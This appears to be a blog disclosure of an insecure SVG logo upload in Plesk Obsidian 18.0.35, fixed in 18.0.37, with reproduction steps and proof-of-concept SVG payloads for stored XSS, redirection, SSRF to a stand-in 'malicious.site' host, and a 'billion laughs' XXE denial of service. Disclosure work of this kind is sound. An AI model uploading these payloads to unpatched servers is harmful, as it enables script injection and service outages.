21b9ad30781a3312d12f4eb3aa07aa4c_M

Plesk Insecure File Upload – Multiple Vulnerabilities

It was discovered an insecure Upload function in Plesk Branding Logo.
By uploading a crafted SVG file as the logo, it is possible to achieve Stored XSS, Redirection, SSRF and XXE.

Product: https://www.plesk.com/

Tested Version: Plesk Obsidian 18.0.35 Update #1

Fixed version: Plesk Obsidian 18.0.37

STEPS TO REPRODUCE:
1.Go to: https://domain.com/plesk/logo/
2.Upload a svg File with the malicious content
3.Return to the main webpage, do right click on the brand logo, and select open image in new tab. The code is going to be executed.

_______________POC XSS_______________
<?xml version=»1.0″ standalone=»no»?>
<!DOCTYPE svg PUBLIC «-//W3C//DTD SVG 1.1//EN» «http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd«>
<svg version=»1.1″ baseProfile=»full» xmlns=»http://www.w3.org/2000/svg«>
<script type=»text/javascript»>alert(«XSS»)</script>
</svg>

_______________POC_ REDIRECTION_______________
<?xml version=»1.0″ encoding=»UTF-8″ standalone=»yes»?>
<svg
onload=»window.location=’http://www.example.com‘»
xmlns=»http://www.w3.org/2000/svg«>
</svg>

______________POC_SSRF_______________
<svg xmlns:svg=»http://www.w3.org/2000/svg» xmlns=»http://www.w3.org/2000/svg» xmlns:xlink=»http://www.w3.org/1999/xlink» width=»200″ height=»200″>
<image height=»30″ width=»30″
xlink:href=»https://malicious.site/malicious.php» />
</svg>

_________POC_XXE_BILLION_LAUGHS_READ_NOTE_PLS____________

!!!!!!!!!!!!!!!!!!IMPORTANT NOTE!!!!!!!!!!!!!!!!!!!!!!!!!!!
DO NOT USE THIS ON PRODUCTION ENVIRONMENT, IT CAUSES A DENIAL OF SERVICE

<?xml version=»1.0″ standalone=»yes»?>
<!DOCTYPE lolz [
<!ENTITY lol «lol»>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 «&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;»>
<!ENTITY lol2 «&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;»>
<!ENTITY lol3 «&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;»>
<!ENTITY lol4 «&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;»>
<!ENTITY lol5 «&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;»>
<!ENTITY lol6 «&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;»>
<!ENTITY lol7 «&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;»>
<!ENTITY lol8 «&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;»>
<!ENTITY lol9 «&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;»>
]>
<lolz>&lol9;</lolz>
<svg width=»128px» height=»128px» xmlns=»http://www.w3.org/2000/svg» xmlns:xlink=»http://www.w3.org/1999/xlink» version=»1.1″>
<text font-size=»23″ x=»8″ y=»28″></text>
</svg>

Etiquetas: Sin etiquetas

Add a Comment

Your email address will not be published. Required fields are marked *

Website Protected by Spam Master